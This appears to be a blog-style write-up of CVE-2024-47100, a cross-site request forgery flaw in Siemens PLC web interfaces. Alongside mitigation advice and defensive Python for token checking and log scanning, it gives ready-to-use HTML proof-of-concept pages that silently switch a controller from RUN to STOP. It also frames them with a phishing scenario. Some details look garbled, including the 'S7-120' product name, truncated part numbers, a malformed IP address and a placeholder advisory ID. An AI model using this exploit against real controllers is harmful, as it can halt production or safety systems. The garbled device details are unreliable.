CVE-2024-47100 is a recently disclosed vulnerability affecting a wide range of Siemens SIMATIC S7-120 and SIPLUS S7-120 PLCs. The bug exists in their web interface, exposing it to Cross-Site Request Forgery (CSRF) attacks. With a simple trick—like a booby-trapped link in an email—an attacker could make a logged-in user (such as an operator) change the CPU mode (like from "RUN" to "STOP") on industrial controllers without them ever realizing they did it. This could disrupt processes, production lines, or safety systems in sectors like manufacturing, energy, or water.

Below, we break down how this works, how to exploit it, and what you can do to prevent it.

What Devices Are Vulnerable?

Affected devices include many versions of Siemens SIMATIC S7-120 and SIPLUS S7-120 CPUs. These are common in industrial plants worldwide.

Sample affected part numbers

- SIMATIC S7-120 CPU 1211C AC/DC/Rly (6ES7211-1BE40-XB)
- SIMATIC S7-120 CPU 1212C DC/DC/DC (6ES7212-1AE40-XB)
- SIPLUS S7-120 CPU 1212 AC/DC/RLY (6AG1212-1BE40-2XB)
- SIPLUS S7-120 CPU 1215 AC/DC/RLY (6AG1215-1BG40-2XB)

For the full list, see: Siemens Advisory (CERT-2024-XX)

How Does the Vulnerability Work?

Many SIMATIC/SIPLUS devices have an HTTP web interface for remote monitoring and control. Operators log in using their browsers for convenient configuration, monitoring, or maintenance.

What is CSRF?

CSRF (Cross-Site Request Forgery) is a web vulnerability that lets an attacker trick a logged-in user's browser into performing unwanted actions on a web app. Because the request arrives with the genuine session cookie, the server accepts it as if the user had made it.

For example:

- The user logs in at the PLC web interface (http://plc-ip).
- While still logged in, the user visits an attacker-controlled page (for example, via a link in an email).
- That malicious page silently triggers a command (like "Set PLC to STOP") using the user's permissions.

What Can Go Wrong?

On these PLCs, the web interface does not adequately verify the origin of state-changing requests: there is no CSRF token and no Referer/Origin header check. So any user with a session, and enough PLC permissions, can be silently tricked into, say, stopping the controller.
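The two checks the write-up says are missing (an Origin/Referer check and a per-session CSRF token), written out as an added example. This is not Siemens code and not the real firmware API; the endpoint path is the hypothetical one used in this write-up, and PLC_ORIGIN, the session dict and the csrf_token form field are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed placeholder for the PLC's own origin; the real value is the
# scheme and host operators type into the browser.
PLC_ORIGIN = "http://plc.example"
# Hypothetical endpoint from the write-up; in a real device every
# state-changing handler would go through this check.
STATE_CHANGING_PATHS = {"/webcfg/cpu_mode.cgi"}


def issue_csrf_token(session):
    """Synchronizer token: a random value bound to the server-side session and
    embedded in the legitimate form, which a cross-site page cannot read."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _origin_of(url):
    """Reduce a full URL (Origin or Referer header) to scheme://host[:port]."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def validate_state_change(method, path, headers, form, session):
    """Return (allowed, reason) for one request.  The vulnerable interface
    accepts any request that carries a valid session cookie, so a forged form
    from another site is indistinguishable from the operator's own click."""
    if path not in STATE_CHANGING_PATHS:
        return True, "not a state-changing endpoint"
    hdrs = {k.lower(): v for k, v in headers.items()}

    # A GET with ?mode=STOP (the hidden <img> trick) must never change state.
    if method.upper() != "POST":
        return False, "state change requires POST"

    # Browsers attach Origin to POST requests; fall back to Referer for older
    # clients.  Either way it must name the PLC itself.
    source = hdrs.get("origin") or hdrs.get("referer")
    if source is None or _origin_of(source) != PLC_ORIGIN.lower():
        return False, "missing or foreign Origin/Referer"

    # The form must echo the session's token; compare in constant time.
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "CSRF token missing or invalid"
    return True, "ok"


def demo():
    """Run the forged POST, the forged GET and a genuine request through the check."""
    session = {}
    token = issue_csrf_token(session)
    forged_post = validate_state_change(
        "POST", "/webcfg/cpu_mode.cgi",
        {"Origin": "http://attacker.example"}, {"mode": "STOP"}, session)
    forged_get = validate_state_change(
        "GET", "/webcfg/cpu_mode.cgi",
        {"Referer": "http://attacker.example/page.html"}, {"mode": "STOP"}, session)
    genuine = validate_state_change(
        "POST", "/webcfg/cpu_mode.cgi",
        {"Origin": "http://plc.example"}, {"mode": "STOP", "csrf_token": token}, session)
    return forged_post, forged_get, genuine


if __name__ == "__main__":
    for name, result in zip(("forged POST", "forged GET", "genuine POST"), demo()):
        print(f"{name}: allowed={result[0]} ({result[1]})")
```

Since plant operators cannot change the PLC firmware themselves, the same two checks are what a reverse proxy placed in front of the web interface would enforce until the vendor update is applied: drop any mode-change request whose Origin is not the PLC, and inject and verify the token on the login page's forms.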

How the Exploit Works

Let's get practical: here's how an attacker can change the CPU mode (for instance, switch it from RUN to STOP) if a logged-in operator clicks their crafted link.

Suppose the PLC web interface has a URL for setting the CPU mode:

POST http://<PLC-IP>/webcfg/cpu_mode.cgi

and expects parameters like:

mode=STOP

Malicious HTML page

<!DOCTYPE html>
<html>
  <body>
    <h3>Click here to see an interesting diagram!</h3>
    <img src="http://192.168..100/webcfg/cpu_mode.cgi?mode=STOP" style="display:none;">
    <!-- Or, for a POST (auto-submitted form plus JS): -->
    <form action="http://192.168..100/webcfg/cpu_mode.cgi" method="POST" id="csrfForm">
      <input type="hidden" name="mode" value="STOP">
    </form>
    <script>
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

- When the victim is logged into the PLC's web portal and visits this page, their browser sends the CPU mode change request _with their valid session_.
- The attacker's page sends a silent POST request to /webcfg/cpu_mode.cgi with mode=STOP to the PLC.

Demo Snippet: CSRF “Stop PLC” Exploit

Here is a complete proof-of-concept that can be dropped into any webpage (change PLC IP as needed):

<!DOCTYPE html>
<title>PLC CPU STOP – PoC</title>
<body>
<p>Loading interesting picture...</p>
<form id="csrf" action="http://192.168..100/webcfg/cpu_mode.cgi" method="POST">
    <input type="hidden" name="mode" value="STOP">
</form>
<script>
window.onload = function() {
    document.getElementById('csrf').submit();
};
</script>
</body>

How it works:

- The user visits this web page.
- If their browser is logged in to the PLC web interface at 192.168..100, the PLC receives the mode=STOP POST and goes to STOP.

Real-World Attack Scenario

Imagine:

- A maintenance engineer at a bottling factory logs into the SIMATIC PLC via the web interface for routine checks.
- Later, she reads her email. She sees a "PLC manual update" link and clicks it.
- The link loads the attacker's CSRF code above.
- The PLC, and the whole line, stops instantly.

How to Defend Against CVE-2024-47100

1. Patch/Update
Check Siemens’ advisory for firmware updates and apply ASAP.

2. Minimize Web Interface Use
If possible, disable or restrict the web interface on critical controllers.

3. Enforce Network Segmentation
Never expose PLC web UIs to the public, and limit which internal hosts can reach them.

4. Log Out After Use
Train users to ALWAYS log out of PLC web sessions after work.

5. Use Secure User Permissions
Grant minimal privileges to each user—never “admin” to everyone.

6. Browser Hygiene
Don’t mix work (PLC access) and general browsing on the same workstation.
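Alongside the segmentation and hygiene measures above, a defender will want to know whether a forged mode change has already happened. The following added example (not from this write-up or from Siemens) scans access-log lines for requests to the hypothetical mode-change endpoint that did not originate from the PLC's own pages. It assumes a reverse proxy or web gateway in front of the PLC writing Apache/nginx combined-format logs, since the PLC itself may not log; PLC_HOST, the endpoint path and every sample line are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed placeholders: the PLC's hostname as operators reach it, and the
# write-up's hypothetical mode-change endpoint.
PLC_HOST = "plc.example"
SENSITIVE_PATH = "/webcfg/cpu_mode.cgi"

# Apache/nginx "combined" log format, as a reverse proxy or web gateway in
# front of the PLC would write it (assumption: the PLC itself may not log).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines: a normal status read, a mode change driven from the
# PLC's own page, the same change driven from a webmail page, and the hidden
# <img> GET variant with no Referer at all.
SAMPLE_LOG = """\
10.0.5.21 - - [14/Jan/2025:11:02:07 +0000] "GET /webcfg/status.cgi HTTP/1.1" 200 812 "http://plc.example/webcfg/" "Mozilla/5.0"
10.0.5.21 - - [14/Jan/2025:11:05:41 +0000] "POST /webcfg/cpu_mode.cgi HTTP/1.1" 200 97 "http://plc.example/webcfg/cpu.html" "Mozilla/5.0"
10.0.5.21 - - [14/Jan/2025:11:19:03 +0000] "POST /webcfg/cpu_mode.cgi HTTP/1.1" 200 97 "http://mail.example/inbox/msg/4711" "Mozilla/5.0"
10.0.5.33 - - [14/Jan/2025:11:20:15 +0000] "GET /webcfg/cpu_mode.cgi?mode=STOP HTTP/1.1" 200 97 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_reasons(rec):
    """Why a mode-change request looks forged; empty list if it looks legitimate."""
    path = rec["target"].split("?", 1)[0]
    if path != SENSITIVE_PATH:
        return []
    reasons = []
    if rec["method"] != "POST":
        reasons.append(f"mode change via {rec['method']} (hidden <img>/link pattern)")
    referer = rec["referer"]
    host = urlsplit(referer).hostname if referer and referer != "-" else None
    if host is None:
        reasons.append("no Referer on a state-changing request")
    elif host.lower() != PLC_HOST:
        reasons.append(f"Referer from foreign host {host}")
    return reasons


def find_suspect_mode_changes(log_text):
    """Scan access-log text and return one alert per request that changes the
    CPU mode without originating from the PLC's own pages."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = suspicious_reasons(rec)
        if reasons:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                           "referer": rec["referer"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in find_suspect_mode_changes(SAMPLE_LOG):
        print(f"{a['ts']} {a['ip']} {a['method']}: " + "; ".join(a["reasons"]))
```

A missing Referer is a weak signal on its own, since referrer policies on the linking site can strip it, but on a request that changes the CPU mode it is worth an alert, and a Referer naming a webmail or other foreign host is the direct trace of the scenario described above. The same proxy that writes these logs is also the practical place to block such requests until the firmware update is applied.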

References

- Siemens Security Advisory SSA-337959
- Siemens Product CERT portal
- MITRE CVE-2024-47100 entry
- OWASP Guide: CSRF

Final Thoughts

CSRF might look “boring” compared to remote code execution, but on a PLC, a one-click shutdown can be devastating to a plant. CVE-2024-47100 reminds us that even basic web bugs become critical in Industrial Control Systems.

Timeline

Published on: 01/14/2025 11:15:16 UTC